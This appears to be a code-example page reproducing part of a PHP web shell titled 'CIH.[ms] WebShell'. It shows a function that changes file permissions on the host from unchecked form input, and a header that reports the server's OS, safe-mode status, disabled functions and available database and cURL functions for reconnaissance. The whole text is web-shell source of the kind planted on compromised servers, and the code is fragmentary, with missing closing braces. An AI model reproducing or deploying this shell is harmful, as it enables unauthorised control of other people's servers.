예제 #1
function chmodz($file)
    $check = fileperms($file);
    if (!$check) {
        echo "<b>chmod error: can`t get current value!</b>";
    } else {
        $form = TRUE;
        if (isset($_POST["chmod_submit"])) {
            $chmod_o = $_POST["chmod_o"];
            $chmod_g = $_POST["chmod_g"];
            $chmod_w = $_POST["chmod_w"];
            $octet = trim("0" . base_convert(($chmod_o["r"] ? 1 : 0) . ($chmod_o["w"] ? 1 : 0) . ($chmod_o["x"] ? 1 : 0) . ($chmod_g["r"] ? 1 : 0) . ($chmod_g["w"] ? 1 : 0) . ($chmod_g["x"] ? 1 : 0) . ($chmod_w["r"] ? 1 : 0) . ($chmod_w["w"] ? 1 : 0) . ($chmod_w["x"] ? 1 : 0), 2, 8));
            if (chmod($file, octdec($octet))) {
                $form = FALSE;
                echo "chmoded " . $file . " to " . $octet . "! <a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='" . $_POST["dir"] . "'; document.reqs.submit();\">back</a><br><br>";
            } else {
                echo "can't chmod to " . $octet . "! <a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='" . $_POST["dir"] . "'; document.reqs.submit();\">back</a><br><br>";
        if (isset($_POST["chmod_string"])) {
            if (chmod($file, octdec($_POST["string"]))) {
                $form = FALSE;
                echo "chmoded " . $file . " to " . $_POST["string"] . "! <a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='" . $_POST["dir"] . "'; document.reqs.submit();\">back</a><br><br>";
            } else {
                echo "can't chmod to " . $_POST["string"] . "! <a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='" . $_POST["dir"] . "'; document.reqs.submit();\">back</a><br><br>";
        if ($form) {
            $perms = fperms($file, "array");
            echo "<br>chmoding " . $file . ": " . view_perms_color($file) . " (" . substr(decoct($check), -4, 4) . ") owned by: <br>" . owner($file) . "<br>\n   <br>input string: <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"POST\">\n   <input type=\"hidden\" name=\"p\" value=\"f\">\n   <input type=\"hidden\" name=\"file\" value=\"" . $file . "\">\n   <input type=\"hidden\" name=\"action\" value=\"chmod\">\n   <input type=\"hidden\" name=\"dir\" value=\"" . $_POST["dir"] . "\">\n   <input type=\"text\" name=\"string\" maxlength=\"4\" size=\"4\" value=\"" . substr(decoct($check), -4, 4) . "\">\n   <input type=\"submit\" name=\"chmod_string\" value=\"Save\"></form>";
            echo "<br> or select checkboxes:<br><form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"POST\">\n   <input type=\"hidden\" name=\"p\" value=\"f\">\n   <input type=\"hidden\" name=\"file\" value=\"" . $file . "\">\n   <input type=\"hidden\" name=\"action\" value=\"chmod\">\n   <input type=\"hidden\" name=\"dir\" value=\"" . $_POST["dir"] . "\">\n   <table align=\"left\" width=\"300\" border=\"0\" cellspacing=\"0\" cellpadding=\"5\">\n   <tr>\n    <td><b>Owner</b><br>\n     <input type=\"checkbox\" name=\"chmod_o[r]\" value=\"1\"" . ($perms["o"]["r"] ? " checked" : "") . "> read<br>\n     <input type=\"checkbox\" name=\"chmod_o[w]\" value=\"1\"" . ($perms["o"]["w"] ? " checked" : "") . "> write<br>\n     <input type=\"checkbox\" name=\"chmod_o[x]\" value=1" . ($perms["o"]["x"] ? " checked" : "") . "> execute\n    </td>\n    <td><b>Group</b><br>\n     <input type=\"checkbox\" name=\"chmod_g[r]\" value=\"1\"" . ($perms["g"]["r"] ? " checked" : "") . "> read<br>\n     <input type=\"checkbox\" name=\"chmod_g[w]\" value=\"1\"" . ($perms["g"]["w"] ? " checked" : "") . "> write<br>\n     <input type=\"checkbox\" name=\"chmod_g[x]\" value=\"1\"" . ($perms["g"]["x"] ? " checked" : "") . "> execute\n    </td>\n    <td><b>World</b><br>\n     <input type=\"checkbox\" name=\"chmod_w[r]\" value=\"1\"" . ($perms["w"]["r"] ? " checked" : "") . "> read<br>\n     <input type=\"checkbox\" name=\"chmod_w[w]\" value=\"1\"" . ($perms["w"]["w"] ? " checked" : "") . "> write<br>\n     <input type=\"checkbox\" name=\"chmod_w[x]\" value=\"1\"" . ($perms["w"]["x"] ? " checked" : "") . "> execute\n    </td>\n   </tr>\n   <tr><td><input type=\"submit\" name=\"chmod_submit\" value=\"Save\"></td></tr>\n   </table></form>";
    return TRUE;
function do_header($f, $auth, $os, $path)
    echo '<html><head>';
    if (isset($_POST['cmd']) || isset($_POST['alias'])) {
        echo '<meta http-equiv="Content-Type" content="text/html; charset=cp866">';
    } else {
        echo '<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">';
    echo '
<title> CIH.[ms] WebShell </title>
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<body><div style="position:absolute; left:0px; top:0px; background:#333; text-align:center; padding-left:100px; padding-right:100px; height:90%">
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<table style="width:100%; height:25px;">
   <tr style="background:#2c2c2c;">
    <td style="color:#666; font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:left; padding-left:6px;">
   cihshell on <b>' . $_SERVER['HTTP_HOST'] . '</b>
    echo "<form method='post' action='' style='padding:0px; margin:0px;'><input type='hidden' name='path' value='" . $path . "' class='m2'><td class='m'><input type='submit'  value='main' class='m2'></td>";
    foreach ($f as $k => $v) {
        echo "\r\n        <!-- {$k} -->\r\n        <td class='m'><input type='submit' name='do' value='{$v}' class='m2'></td>\r\n       ";
    if ($auth) {
        echo "<td class='m'><input type='submit' name='do' value='logout' class='m2'></td>";
    $disfun = ini_get('disable_functions');
    $safe_mode = ini_get("safe_mode");
    if (!$safe_mode) {
        $safe_mode = 'Off';
    } else {
        $safe_mode = 'On';
    $mysql_try = function_exists('mysql_connect');
    if ($mysql_try) {
        $mysql = 'On';
    } else {
        $mysql = 'Off';
    $pg_try = function_exists('pg_connect');
    if ($pg_try) {
        $pg = 'On';
    } else {
        $pg = 'Off';
    $mssql_try = function_exists('mssql_connect');
    if ($mssql_try) {
        $mssql = 'On';
    } else {
        $mssql = 'Off';
    $ora_try = function_exists('ocilogon');
    if ($ora_try) {
        $ora = 'On';
    } else {
        $ora = 'Off';
    $curl_try = function_exists('curl_version');
    if ($curl_try) {
        $curl = 'On';
    } else {
        $curl = 'Off';
    $perms = fperms($path);
    echo ' </tr>

<table style="width:100%; margin-top:5px;"><tr>
<td class="logo" style="width:120px;">CIH.<span style="color:#555">[</span><span style="color:#888">ms</span><span style="color:#555">]</span></td>
<td class="i" style="padding-right:5px; text-align:right;">
<nobr><b style="color:#666"><i>' . $perms . '</i></b>  <span style="color:#333">|</span></nobr>
<nobr>OS: <b>' . php_uname() . '</b>  <span style="color:#333">|</span></nobr>
<nobr>safe mode: <b>' . $safe_mode . '</b>  <span style="color:#333">|</span></nobr>
<nobr>cURL: <b>' . $curl . '</b>  <span style="color:#333">|</span></nobr>
<nobr>MySQL: <b>' . $mysql . '</b>  <span style="color:#333">|</span></nobr>
<nobr>MSSQL: <b>' . $mssql . '</b> <span style="color:#333">|</span></nobr>
<nobr>PostgreSQL: <b>' . $pg . '</b> <span style="color:#333">|</span></nobr>
<nobr>Oracle: <b>' . $ora . '</b> <span style="color:#333">|</span></nobr>
PHP:  <b>' . phpversion() . '</b>

<div style="border-bottom:1px solid #232323; margin-bottom:2px; font-size:5px;">&nbsp;</div>';
    if (!empty($disfun)) {
        echo '<div style="border-bottom:1px solid #232323; margin-bottom:2px; font-size:10px; color:#666; text-align:right; padding:5px;"><b>disabled functions:&nbsp;</b>' . $disfun . '</div>';